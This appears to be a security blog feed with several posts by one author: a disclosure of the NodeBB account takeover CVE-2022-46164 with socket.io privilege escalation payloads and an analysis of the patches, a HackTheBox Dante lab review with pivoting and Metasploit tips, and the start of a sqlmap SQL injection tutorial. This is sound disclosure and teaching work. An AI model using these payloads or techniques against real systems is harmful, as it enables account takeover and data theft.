<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/socket.io/?EIO=4&transport=polling&t=mGkgMb&sid=cifBV2fveLLpUfAEAAAE
</code></pre></div></div>
<p>When using the socket, all data that is sent <strong>to</strong> the server is provided in the body of <code class="language-plaintext highlighter-rouge">POST</code> requests. Data received <strong>from</strong> the server is obtained using <code class="language-plaintext highlighter-rouge">GET</code> requests. The server will return all messages in the polling queue for the client in its response to each <code class="language-plaintext highlighter-rouge">GET</code>.</p>
<p>Unlike HTTP native <code class="language-plaintext highlighter-rouge">POST</code> requests, responses relating to the request are <strong>not</strong> returned in the response to the <code class="language-plaintext highlighter-rouge">POST</code>. You need to make a subsequent <code class="language-plaintext highlighter-rouge">GET</code> request to retrieve the response from the polling queue. What you will normally receive in response to a <code class="language-plaintext highlighter-rouge">POST</code> to the server is an <code class="language-plaintext highlighter-rouge">ok</code>.</p>
<p>The first message we want to send to the server to fully establish the session is a “handshake”. Which is <code class="language-plaintext highlighter-rouge">40</code>, sent with a <code class="language-plaintext highlighter-rouge">POST</code> as discussed. Follow this up with a <code class="language-plaintext highlighter-rouge">GET</code> to retrieve the response to the “handshake”. In this example this looked as follows.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>40{"sid":"4eGiqjzlLKwLvS3QAAAF"} 42["checkSession",3] 42["setHostname","vm01"]
</code></pre></div></div>
<p>Now we can perform our privilege escalation. Send a <code class="language-plaintext highlighter-rouge">POST</code> like the following. There is no need for any follow up <code class="language-plaintext highlighter-rouge">GET</code> polling for this request, it will not generate a response.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>421["constructor.assign",{"uid":1}]
</code></pre></div></div>
<p>Now we should have an admin session. Then send an admin request in a <code class="language-plaintext highlighter-rouge">POST</code>. The following will request API keys. Then issue a <code class="language-plaintext highlighter-rouge">GET</code> to retrieve the response.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>422["admin.settings.get",{"hash": "core.api"}]
</code></pre></div></div>
<p>A simple Python POC to implement these operations is below. Running against a local NodeBB instance against an authenticated session would involve the following.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>./poc.py -d 127.0.0.1:4567 -u 1 -n -c <cookie_value>
</code></pre></div></div>
<p>The code for the POC exploit can be found <a href="https://github.com/stephenbradshaw/CVE-2022-46164-poc">here</a>.</p>
<h2 id="the-fix-for-the-vulnerability">The fix for the vulnerability</h2>
<p>This vulnerability was patched in commit <a href="https://github.com/NodeBB/NodeBB/commit/48d143921753914da45926cca6370a92ed0c46b8">48d143921753914da45926cca6370a92ed0c46b8</a>. If you look at the commit, you will see that it involves one very simple change.</p>
<p>The initialization for the <code class="language-plaintext highlighter-rouge">Namespaces</code> variable changes from this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const Namespaces = {};
</code></pre></div></div>
<p>To this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>const Namespaces = Object.create(null);
</code></pre></div></div>
<p>What has been done here? According to the Mozilla JavaScript reference for <a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object#null-prototype_objects">Object</a>:</p>
<blockquote>
<p>Almost all objects in JavaScript ultimately inherit from Object.prototype (see inheritance and the prototype chain). However, you may create null-prototype objects using Object.create(null) or the object initializer syntax with <strong>proto</strong>: null (note: the <strong>proto</strong> key in object literals is different from the deprecated Object.prototype.<strong>proto</strong> property). You can also change the prototype of an existing object to null by calling Object.setPrototypeOf(obj, null).</p>
</blockquote>
<p>So after this change the <code class="language-plaintext highlighter-rouge">Namespaces</code> variable is a null-prototype object. How does this help resolve this vulnerability?</p>
<p>Lets compare objects created using the previous and current approach in the Node REPL to see how they differ.</p>
<p>Below we create <code class="language-plaintext highlighter-rouge">Namespaces1</code> using the original Javascript object approach, and <code class="language-plaintext highlighter-rouge">Namespaces2</code> using the null-prototype approach. Then we try and use tab completion on each variable to see the accessible properties. (Type the variable name, followed by <code class="language-plaintext highlighter-rouge">.</code> then hit tab twice to have the REPL “complete” the available options for you.)</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>node
Welcome to Node.js v16.19.0.
Type ".help" for more information.
> const Namespaces1 = {};
undefined
> const Namespaces2 = Object.create(null);
undefined
> Namespaces1.
Namespaces1.__proto__ Namespaces1.constructor Namespaces1.hasOwnProperty
Namespaces1.isPrototypeOf Namespaces1.propertyIsEnumerable Namespaces1.toLocaleString
Namespaces1.toString Namespaces1.valueOf
> Namespaces2.
</code></pre></div></div>
<p>Using the tab completion approach, we see that <code class="language-plaintext highlighter-rouge">Namespaces1</code>, created as a normal JavaScript object, has a number of accessible properties “completed” for us. <code class="language-plaintext highlighter-rouge">Namespaces2</code>, however, created with a null-prototype, shows none.</p>
<p>What about if we specifically try and access properties such as the <code class="language-plaintext highlighter-rouge">constructor</code> used in the exploit?</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>> Namespaces2.constructor
undefined
> Namespaces1.constructor
[Function: Object]
>
</code></pre></div></div>
<p>We can see that the <code class="language-plaintext highlighter-rouge">constructor</code> is not available in the null-prototype object.</p>
<p>The null-prototype version of the <code class="language-plaintext highlighter-rouge">Namespaces</code> variable therefore fixes this vulnerability by removing access to properties we use for the exploit.</p>
<h2 id="update-an-additional-patch-for-nested-namespaces">UPDATE: An additional patch for nested namespaces</h2>
<p>A <a href="https://github.com/NodeBB/NodeBB/commit/586eed1407a78a1c1ec3af9bef3866104d3ef7cd">new patch</a> from 31 December 2022 provides a fix for “vulnerability in socket.io nested namespaces”. This new patch is included in NodeBB release <a href="https://github.com/NodeBB/NodeBB/releases/tag/v2.8.1">2.8.1</a>.</p>
<p>As mentioned above, the socket.io code has a <code class="language-plaintext highlighter-rouge">Namespaces</code> object that acts as an allow list for callable functions. The initial fix defined this variable as a null-prototype object, removing the inherited methods and properties that allowed us to access the <code class="language-plaintext highlighter-rouge">assign</code> function and perform the exploit.</p>
<p>However, a number of the modules that are populated into the <code class="language-plaintext highlighter-rouge">Namespaces</code> variable have child objects that include prototypes.</p>
<p>A list of these in the NodeBB base code is below:</p>
<ul>
<li><a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/admin/rooms.js#L15">admin.rooms.stats</a></li>
<li><a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/admin/rooms.js#L16">admin.rooms.totals</a></li>
<li><a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/groups.js#L238">groups.cover</a></li>
<li><a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/meta.js#L8">meta.rooms</a></li>
<li><a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/modules.js#L16">modules.chats</a></li>
<li><a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/modules.js#L17">modules.settings</a></li>
<li><a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/user.js#L39">user.reset</a></li>
<li><a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/user.js#L175">user.gdpr</a></li>
</ul>
<p>Installed plugins could also expose additional objects not listed above.</p>
<p>Any of these allow the exploit to be performed after the 2.6.1 patch by providing additional paths to access the default object prototype. (Although the <code class="language-plaintext highlighter-rouge">admin</code> functions are not usable for this as they are limited to admins only).</p>
<p>So, for example, instead of sending our original exploit payload:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>421["constructor.assign",{"uid":1}]
</code></pre></div></div>
<p>You could send the following for the same result:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>421["groups.cover.constructor.assign",{"uid":1}]
</code></pre></div></div>
<p>The latest patch addresses this by modifying part of the <code class="language-plaintext highlighter-rouge">reduce</code> function that defines <code class="language-plaintext highlighter-rouge">methodToCall</code> as discussed above. The change is on line <a href="https://github.com/NodeBB/NodeBB/blob/8a15e58dff72481f83a0c020459505b6638775f1/src/socket.io/index.js#L126">126</a>.</p>
<p>It changes from this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (prev !== null && prev[cur]) {
</code></pre></div></div>
<p>To this:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>if (prev !== null && prev[cur] && (!prev.hasOwnProperty || prev.hasOwnProperty(cur))) {
</code></pre></div></div>
<p>This essentially adds two more conditions before a child property is resolved, either of which must be met to continue. Both of these conditions relate to the <code class="language-plaintext highlighter-rouge">hasOwnProperty</code> method of the Oject prototype. As defined in the
<a href="https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/hasOwnProperty">Mozilla documentation</a>:</p>
<blockquote>
<p>The hasOwnProperty() method returns a boolean indicating whether the object has the specified property as its own property (as opposed to inheriting it).</p>
</blockquote>
<p>The first condition <code class="language-plaintext highlighter-rouge">!prev.hasOwnProperty</code> returns <code class="language-plaintext highlighter-rouge">true</code> if the <code class="language-plaintext highlighter-rouge">hasOwnProperty</code> method <strong>does not</strong> exist for the object. One case where this method would not exist is for null-prototype objects.</p>
<p>The second condition <code class="language-plaintext highlighter-rouge">prev.hasOwnProperty(cur)</code> returns <code class="language-plaintext highlighter-rouge">true</code> if the property belongs to the object itself instead of being inherited. So properties inherited from the parent prototype like <code class="language-plaintext highlighter-rouge">constructor</code> should return <code class="language-plaintext highlighter-rouge">false</code> if checked with this.</p>
<p>Lets see how this works in the Node REPL. First we create two objects, one with the default prototype, and another with a null-prototype. Then we create child properties for each, with the name <code class="language-plaintext highlighter-rouge">mychild</code>.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>node
Welcome to Node.js v16.19.0.
Type ".help" for more information.
> Namespaces1 = {}
{}
> Namespaces2 = Object.create(null);
[Object: null prototype] {}
> Namespaces1.mychild = 1
1
> Namespaces2.mychild = 1
1
</code></pre></div></div>
<p>Now we attempt various uses of <code class="language-plaintext highlighter-rouge">hasOwnProperty</code> on each object to see the results.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>> !Namespaces1.hasOwnProperty
false
> Namespaces1.hasOwnProperty('constructor')
false
> Namespaces1.hasOwnProperty('mychild')
true
> !Namespaces2.hasOwnProperty
true
> !Namespaces2.hasOwnProperty('constructor')
Uncaught TypeError: Namespaces2.hasOwnProperty is not a function
> !Namespaces2.hasOwnProperty('mychild')
Uncaught TypeError: Namespaces2.hasOwnProperty is not a function
>
</code></pre></div></div>
<p>We can see from this that methods/properties inherited from the object prototype should not be resolved when these additional conditions need to be met.</p>Stephen BradshawDuring a recent security assessment, I found an account takeover vulnerability in NodeBB. I reported this to the NodeBB developers on 28 November 2022, who provided a patch within the hour. The vulnerability has CVE ID CVE-2022-46164, with a rating of 9.4: Critical. The security notification is here. Non administrative NodeBB users can run admin functions and escalate privileges. In some configurations, anonymous users can do the same. The vulnerability affects all NodeBB releases prior to version 2.6.1 2.8.1 (see update below). If you are running NodeBB, you should update now.Hackthebox Dante Review2021-12-15T08:00:00+00:002021-12-15T08:00:00+00:00/2021/12/15/hackthebox_dante-review<p>A while ago at my work we got an Enterprise Professional lab subscription to HackTheBox. With this subscription, I had a chance to complete the Dante Pro lab a few months ago, so I thought I’d do a review of it here.</p>
<p align="center">
<img width="460" height="300" src="https://www.hackthebox.eu/images/press/dante/2.jpg" alt="Dante" />
</p>
<p>The Enterprise Pro lab subscription gives you dedicated access to one lab at a time, and seeing that Dante is the “Beginner” lowest difficulty level lab in the Pro labs series, this was the first environment we had provisioned.</p>
<p>The description of Dante from HackTheBox is as follows:</p>
<blockquote>
<p>Dante Pro Lab is a captivating environment that features both Linux and Windows Operating Systems. You will level up your skills in information gathering and situational awareness, be able to exploit Windows and Linux buffer overflows, gain familiarity with the Metasploit Framework, and much more! Completion of this lab will demonstrate your skills in network penetration testing.</p>
<p>This Penetration Tester Level I lab will expose players to:</p>
<ul>
<li>Enumeration</li>
<li>Exploit Development</li>
<li>Lateral Movement</li>
<li>Privilege Escalation</li>
<li>Web Application Attacks</li>
</ul>
<p>14 Machines and 26 Flags! Take up the challenge and go get them all!</p>
</blockquote>
<p>This is a pretty accurate desciption of whats involved, although there is certainly more stuff in some categories than there is in others. I had to do only one each of a custom Windows and Linux buffer overflow exploit, but there was a whole heap of enumeration, privesc and web application exploits required, plus lateral movement to a sometimes ridiculous degree.</p>
<p>To a large extent Dante can be described as a collection of a whole lot of individual HackTheBox machines. If you have done some of the HackTheBox system challeges, you’ll be familiar with the pattern of exploiting a service or application to gain access as a regular user, grabbing a flag, privescing to root/admin, and then grabbing another flag. There is a lot of that in Dante.</p>
<p>There were definitely a lot fewer dependencies between machines in the Dante network than I expected. There are a few cases where you will need to gather some intel from another box to gain an initial foothold on certain systems you can access quite early on, and using owned boxes as pivots to reach restricted subnets is necessary. However, that was about it in terms of interconnectivity. Extensive dependencies between machines is a feature of the more difficult Pro labs in the series.</p>
<p>I also found that Dante had a number of challenges that were quite contrived and unrealistic. In fact, this almost turned me off the lab entirely in the beginning, because the worst aspects of this are seen early on. If you have spent a certain amount of time pentesting and red teaming, you start to get a feel for the types of decisions users, sysadmins and developers make when they use/manage/build systems. You can learn to anticpiate the mistakes they are likely to make, and you select the techniques you will use accordingly, prioritising some and sometimes ignoring others entirely. This can wrong-foot you badly in Dante.</p>
<p>If you find youself hitting a wall early on, and you have dismissed the use of certain techniqes commonly taught to pentesting beginners because they dont make sense in context, I’d suggest you try them anyway. If something is going wrong with some bit of loot you have found, dont reject certain possible ideas for why that might be happening because “a real user wouldn’t do that”. Think of Dante more as a test of your ability to reproduce various pentesting techniques rather than a realistic network, and be prepared for system configurations and artefacts that would only exist as a result of a delierate attempt to troll someone trying to exploit a system.</p>
<p>This is my one main gripe with Dante, but luckily it is mostly an issue early on in the lab, and once you’re past it (and are accounting for it in your approach) things are a lot more enjoyable.</p>
<p>From the opposite perspective, one thing I really <strong><em>liked</em></strong> about Dante is that it provides excellent experience for making you comfortable with operating through pivots. You start Dante by gaining access to a network environment where you can access one machine (that you need to first identify through scanning). You need to compromise this machine in order to proceed, and from there on, everything you do will be through <em>at least</em> one pivot.</p>
<figure>
<p align="center">
<img width="460" height="300" src="https://i.kym-cdn.com/photos/images/newsfeed/000/531/557/a88.jpg" alt="Pivots galore" />
<figcaption style="text-align: center">We need more pivots</figcaption>
</p>
</figure>
<p>I’ve heard of lots of different approaches that people use to deal with this. Some people swear by <a href="https://github.com/sshuttle/sshuttle">sshuttle</a>. My own approach was to use a combination of the following:</p>
<ul>
<li>Regular old ssh sessions, making use of a bunch of helpful ssh features</li>
<li>A <a href="https://github.com/oyyd/http-proxy-to-socks">http to socks proxy</a> to allow Burp to selectively route traffic both to the Dante network and to the Internet. Certain sites in Dante will load very poorly if you cant access Internet based resources loaded within some pages, and Burp’s regular SOCKS proxy option is all or nothing</li>
<li><a href="https://github.com/rofl0r/proxychains-ng">proxychains4</a> for enabling regular tools to work through the dynamic SOCKS proxies created by ssh</li>
<li>Meterpreter payloads on pivot hosts to use Metasploit’s routing capabilities</li>
</ul>
<p>For ssh I made sure to use keys for authentication - if a key wasn’t already in place for a user on a system, I would add my own key (one generated specifically for Dante). I would also setup an entry for the host in my ssh config file. This made it much more convenient to use ssh for various purposes, including enabling quick and easy transfers of files to and from the host. This also made it much easier to chain multiple ssh connections together via the <em>ProxyCommand</em> option.</p>
<p>An example entry might look something like the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>host dante-host2
Hostname 10.10.10.10
ProxyCommand ssh dante-host1 -W %h:%p
User root
IdentityFile ~/.ssh/id_rsa_dante
DynamicForward 1080
Port 22
</code></pre></div></div>
<p>Hopefully most of this is pretty straightforward, but two lines might benefit from some explanation.</p>
<p>The <em>DynamicForward</em> option would open a SOCKS proxy on port 1080 on my local host. Traffic sent through this proxy would then be routed through the remote host. This is great for forwarding traffic from my host to the network locally attached to the remote ssh host. I would add one of these (with a unique port) to each ssh config entry I wanted to use as a routing point for other traffic.</p>
<p>I would use these to route traffic from Burp using the afore mentioned http to socks proxy, but I would also have individual proxychains4 config files for each SOCKS proxy port. I would use these when running proxychains4 to route traffic to the appropriate networks, using like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>proxychains4 -q -f proxychains_1080.conf <command> <options>
</code></pre></div></div>
<p>One tip for using proxychains is to ensure that if you are running an interpreted program (like a Python script) its a good idea to explicitly reference the Python binary before that script, even if the script starts with a hash bang, e.g.:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>proxychains4 -q -f proxychains_1080.conf python python_script.py
</code></pre></div></div>
<p>Without this specific reference to the script interpreter, sometimes the traffic generated from the script will fail to be routed through the proxy as you intended, and the network connection will fail.</p>
<p>The <em>ProxyCommand</em> option refers to another proxy config entry in the same file named “dante-host1”. This causes your ssh client to first open a connection to dante-host1, and to then tunnel the connection to dante-host2 through that session. So basically, this auto pivots you through dante-host1 to reach dante-host2. You can chain these entries together as well, and have a similar entry for dante-host3 with a <em>ProxyCommand</em> entry referring to dante-host2, which would then go through host1 and host2 to reach its final destination of host3. This is a massive convenience when you have to ssh into a host that requires multiple hops to be accessed.</p>
<p>I would occaisionally also use local forwarding on an ad hoc basis, and when this was required I would use the ssh escape sequence (which by default is ~C) to access the ssh command line and create them as needed. If you’re not familiar with the ssh escape sequence, when the appropriate key combination is pressed at the regular ssh command prompt as the next keypress after <em>Enter</em> it drops you to a special prompt like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh>
</code></pre></div></div>
<p>At this prompt, you gain the ability to enable a number of ssh options without having to enable them from the command line when establishing a new session. You can, for example create a local port forward from port 8888 to the remote host and port 172.16.1.1:8000 in the current session like so:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ssh> -L 8888:172.16.1.1:8000
</code></pre></div></div>
<p>Metasploit was another tool I used frequently throughout Dante, and using its routing options to pivot as needed was very helpful. With the appropriate routes in place you can use Metasploit from your host like it was directly connected to targets in other networks.</p>
<p>To use the routing you need to have a Meterpreter type payload on the host you want to use to pivot, and then modify the Metasploit routing table using the <em>route</em> command in the Metasploit console. As an example, if you want to route traffic to network 172.16.2.0/24 through the Meterpter agent on session 2, you would run the route command as follows:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>route add 172.16.2.0 255.255.255.0 2
</code></pre></div></div>
<p>If you follow my suggested method of using ssh with keys to connect to compromised hosts on the network, another nice trick you can try with Metasploit is to use the “auxiliary/scanner/ssh/ssh_login_pubkey” module to get a shell session on those hosts in Metasploit. As an example, to connect to host 10.10.10.10 as user root with key ~/.ssh/id_rsa_dante, do the following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>use auxiliary/scanner/ssh/ssh_login_pubkey
set USERNAME root
set RHOSTS 10.10.10.10
set KEY_PATH ~/.ssh/id_rsa_dante
exploit
</code></pre></div></div>
<p>Then, when you get your session opened, you can upgrade it to Meterpreter so you can do routing with it using the upgrade option. To upgrade session 1, you would run a command like the following, which would open the Meterpreter session to that host with the next available session number:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sessions -u 1
</code></pre></div></div>
<p>You can also use Metasploits SOCKS proxy module (auxiliary/server/socks_proxy) to forward traffic from external tools in a manner similar to the ssh proxying approach already mentioned. This also uses Metasploit’s inbuilt routing for traffic forwarding, so it allows you to direct other attack traffic via proxychains to any system that Metasploit can talk to. I didnt use this too much in DANTE, as there were ssh servers that could be used to route traffic where it was required. In cases where you have to chain through servers not running ssh however, this can be very useful. This approach does also have the advantage of allowing a single SOCKS port to direct traffic to multiple different network subnets - as long as Metasploit can talk to that segment via its routing through Meterpreter agents.</p>
<p>Another tip I would give is to keep comprehensive notes. Using a heirarchical note taking app, so you can keep categorised notes of your progress, is a great idea. Cherrytree is one option. I used Joplin during Dante, but it did start to grind a little once the pages got bigger, so Im still looking for alternatives.</p>
<p>I had individual pages for each host, where I would keep information related to each host, and a few other pages to summarise various other bits of information about the network.</p>
<p>I took notes of:</p>
<ul>
<li>The flag values I collected, where I found them, and the name that the flag had in the HackTheBox Dante progress page</li>
<li>Credentials I foiund on any machine, to make it easier to try and reuse those credentials on other hosts</li>
<li>Each machine I discovered on each network segment. I had a summary page listing all hosts I had found so far and whether I had obtained root/system on each, and a page for each machine to take notes of things I tried in exploiting it, and how I eventually got access</li>
<li>A playbook for reestablishing access to systems, especially key tunneling hosts. If the lab gets reverted, or you need to get back into hosts you have already exploited to check if any critical information has been missed, this will be a big time saver. Using existing credentials or keys that will survive lab reversions is always the best option where available</li>
</ul>
<p>There are also a few other random tools and resources that proved very helpful during Dante. These include:</p>
<ul>
<li><a href="https://github.com/carlospolop/PEASS-ng">Peas</a> - A privilege escalation checker for Linux and Windows</li>
<li><a href="https://github.com/DominicBreuker/pspy">pspy</a> - A tool for snooping on process execution events on Linux with unprivileged users</li>
<li><a href="https://book.hacktricks.xyz/">hacktricks.xyz</a> - A wiki collecting a bunch of hacking techniques that I referred to a lot durung Dante</li>
</ul>
<p>I hope this review gave you a good idea of what the Dante pro lab is like, and some useful tips in how to operate in it. I did enjoy the experience of doing the lab, and am planning to do a few more HackTheBox Pro labs when time permits.</p>Stephen BradshawA while ago at my work we got an Enterprise Professional lab subscription to HackTheBox. With this subscription, I had a chance to complete the Dante Pro lab a few months ago, so I thought I’d do a review of it here.Moving to Jekyll2020-10-08T08:54:15+00:002020-10-08T08:54:15+00:00/2020/10/08/moving-to-jekyll<p>I finally decided to migrate the blog to a static site generated by Jekyll and hosted on GitHub pages. Now that I dont have to fight Blogger to get a post written, and can just write markdown and upload it to GitHub, I may actually update this blog a little more frequently…</p>Stephen BradshawI finally decided to migrate the blog to a static site generated by Jekyll and hosted on GitHub pages. Now that I dont have to fight Blogger to get a post written, and can just write markdown and upload it to GitHub, I may actually update this blog a little more frequently…Exploiting difficult SQL injection vulnerabilities using sqlmap: Part 12017-01-05T07:25:00+00:002017-01-05T07:25:00+00:00/2017/01/05/exploiting-difficult-sql-injection<h3>Introduction</h3><br/>A number of times when discovering "tricky" SQL Injection vulnerabilities during penetration tests, I have taken the approach of exploiting them by writing custom tools. This usually after spending 5 minutes blindly poking at the vulnerability with sqlmap, and then stopping when it didn't immediately magic the answer for me.<br/><br/>OK, there have been a number of times where sqlmap has NOT been a suitable tool to use for various reasons, such as very particular filtering or data retrieval requirements, but there has also been a number of cases where I probably gave up on it too fast because I didn't properly understand how it worked or the extent of its capabilities. And this resulted in me taking much longer than necessary to exploit the vulnerability.<br/><br/>While writing custom tools can certainly be "fun" (for some definitions of "fun"), and while it provides some good coding practice and is an excellent way to ensure that you understand the injection flaw and its exploitation extremely well, its also very time consuming. Writing your own injection tool often involves redoing a lot of work that has already been done by others - the digital equivalent of reinventing the wheel. You need to put together a capable HTTP sending/receiving framework, you need to parse HTML responses, you need to discover the (database specific) SQL commands that will allow you to retrieve data within the limitations imposed by the vulnerability, you need to be able to extract, group, infer, convert and/or join the retrieved data and you need to mentally map out the logic needed to tie all these parts together and turn it into working code with a usable interface. Its a deceptively large amount of effort, especially when blind injection is involved, and I would consistently underestimate how long it would take to perform.<br/><br/>Given that sqlmap already has all this functionality, being in particular a very effective tool for retrieving data via all types of SQL injection vulnerabilities, I recently decided that it might be a good idea to spend some of my time to gain an improved understanding of the tool, so that in future I would be able to make more frequent use of it.<br/><br/>For my vulnerability test bed, I used some of the SQL injection labs from the <a href="https://www.pentesterlab.com/">Pentester Labs</a> website, namely the <a href="https://www.pentesterlab.com/exercises/web_for_pentester">Web for Pentester</a> and <a href="https://www.pentesterlab.com/exercises/web_for_pentester_II">Web for Pentester II</a> exercises, because those particular exercises are freely downloadble, easy to self host and provide some great examples of SQLi vulnerabilities that require use of some of sqlmap's custom options for exploitation.<br/><br/>This will be the first in a series of posts where I share some of what I learned during this process. This first post will mainly seek to introduce and explain the relevant sqlmap options that I used and outline a process that can be used to get sqlmap to identify an SQL injection flaw that you have discovered through other testing activities. Future entries will provide examples of actually using this to exploit SQL injection vulnerabilities that sqlmap cannot easily detect on its own.<br/><br/><blockquote class="tr_bq"><b>Note</b>: While I will use their content as examples, the intent here is NOT to explain how to discover or do manual exploitation of the SQLi vulnerabilities in the PentesterLab exercises - because that has already been written up in the PentesterLab courseware available at their <a href="https://www.pentesterlab.com/">web site</a>. If you don't already know how to do manual discovery of SQLi vulnerabilities, you can check out their site, or any of the many other SQLi references on the Internet to learn this (for the record though, I think the PentesterLab stuff is a fantastic introduction to web application pentesting, and I wish I had access to it when I first started doing webapp testing).</blockquote><br/><h3></h3><h3>Useful sqlmap options</h3><br/>Before I jump into working through specific examples, I wanted to describe the purpose of some sqlmap options. More advanced use of sqlmap, in terms of actually tweaking its operation in order to make a difficult injection operate, will require that you actually understand how these options work. In essence, this is the README I wish I had received when I moved beyond the bare basics in my use of the tool, as I definitely would have used sqlmap much more extensively had I understood these particular options as well as I do now. Hopefully you can now benefit from my having learned this the "hard" way, e.g. via trial and error.<br/><br/><h4><span style="font-size: large;">Prefix and suffix</span></h4><br/>The prefix (--prefix) and suffix (--suffix) options configure the strings that should be included with each SQL injection payload in order to begin, and then terminate, the Injection. So what does this mean exactly?<br/><br/>Take this simple example of an injectible query:<br/><br/><pre class="code">$query = "SELECT first_name, last_name FROM users WHERE name = '" . $_GET["username"] . "'";</pre><br/><br/>Whats an example of an injection string that would work here? Something like the following would work as a simple POC of a union injection.<br/><br/><pre class="code">' UNION SELECT NULL,NULL -- a</pre><br/><br/>This closes the single quoted string before our injection point with a single quote ('), seperates the next statement with a space ( ), adds our injection query of a UNION SELECT with a column count matching that of the existing SELECT query, and then comments out the remainder of the original query to ensure syntactical correctness. The prefix in this case is the single quote and space (' ) used before the UNION SELECT, and the suffix is the characters (a space, two dashes, another space and the letter "a") used to comment out the remainder of the original query ( -- a).<br/><br/>The following options can be used to configure sqlmap to use this prefix and suffix:<br/><br/><pre class="code"> --prefix="' " --suffix=' -- a'</pre><br/><br/>Now, these particular examples of prefixes and suffixes (or ones that are functionality identical) are ones that sqlmap will be able to figure out itself, so you will rarely need to specify values like this. However, this hopefully does help you in understanding what these options do, because they are quite important ones to grasp if you want to use sqlmap for more difficult injections. In fact, I put these options first in the list of ones I wanted to describe because as I was working through this process of learning how to make sqlmap identify certain injection vulnerabilities, these were the ones that I used the most. Also, finally learning what these did was an "AHA!" moment for me, as I have been aware of the options existence for an embarassingly long time without understanding what they did.<br/><br/><blockquote class="tr_bq"><b>Note</b>: Why use NULL values in the UNION SELECT? NULL is a great value to use in UNIONS when trying to determine the correct number of columns in an injection, as it can sit in place of a number of different field types, such as numbers, strings and dates.</blockquote><blockquote class="tr_bq"><b>Note2</b>: Why the extra space and the "a" character after the comment? Sometimes, inserted comments at the end of an injection are not properly recognised by the database unless there is a whitespace character to follow. Since whitespace characters on their own are sometimes not easily identifiable when displayed on screen (depending on what other text follows) its helpful to include other text afterwards so you can easily see there is something following the comment. You will see sqlmap do this when you look at some of the injection strings it uses.</blockquote><br/><h4><span style="font-size: large;">Specifying Injection technique and tests</span></h4><br/>There are a number of different SQL injection techniques available for use in sqlmap, which are configured via the --technique option, and sqlmap comes with a number of different in built tests for exploiting vulnerabilities using those techniques. By default, sqlmap will enable all possible techniques when trying to identify an injection vulnerability, and will run all associated tests that meet the configured risk and level settings (discussed later).<br/><br/>If you have manually discovered a SQL injection flaw in a website and want to use sqlmap to exploit the vulnerability, you may already know the correct technique, as well as the most appropriate payload configuration to use, and this is where specifying these options manually can be useful. Manual specification of these settings helps prevents less effective techniques from being chosen by sqlmap, and cuts down on the amount of traffic sent by sqlmap during its detection period.<br/><br/>A brief listing of the injection techniques available for use by sqlmap is listed below in order of preference. You can select the appropriate ones by using the --technique switch followed by a listing of the letters associated with the method/s you wish to use. The default is all options, (e.g. "--technique=BEUSTQ"). The descriptions provided below are only intended as high level reminders of each technique<br/><ul><li><b>Stacked queries (S)</b> - This involves stacking whole new SQL queries onto the end of the existing injectable query. Its the preferred method to use if available, because there are a number of exploitation actions that wont be available to you using any other method, however the use of this method does require support from the database and API. You may not necessarily be able to see the results of your stacked query in the page response, so when actually retrieving data (as opposed to performing other operations such as INSERTS) you may want to use another technique such as Unions.</li><li><b>Union query based (U)</b> - This involves retrieving data by joining a second select statement to the original, via the UNION SELECT statement. You need to be able to see the results from the original SELECT query (and hence your UNION) in the page response for this method to be usable.</li><li><b>Error based (E) </b>- This technique retrieves data by manipulating database error messages to directly display that data. To use this method, you need to be able to see database error messages in page responses.</li><li><b>Inline queries (I)</b> - This technique uses inline database queries to retrieve data - essentially a query embedded within another query like this "SELECT (SELECT password from user) from product". I have not personally had the occasion to use this option in sqlmap, and while inline queries can be used more widely than this in manual injection scenarios, it appears that you need to be able to see the inline queries result in the page response for this to be usable through sqlmap.</li><li><b>Boolean blind (B)</b> - This retrieves data from the database by asking a series of True/False style questions in your injections, and determining the result (True or False) based on identifiable changes in the response. To use this option, you need to be able to be able to trigger some sort of identifiable state change in HTTP response content from logically different, but syntactically correct database queries (e.g. a different page response only resulting from an invalid database query doesn't count here). This technique will require more requests and time to perform than those 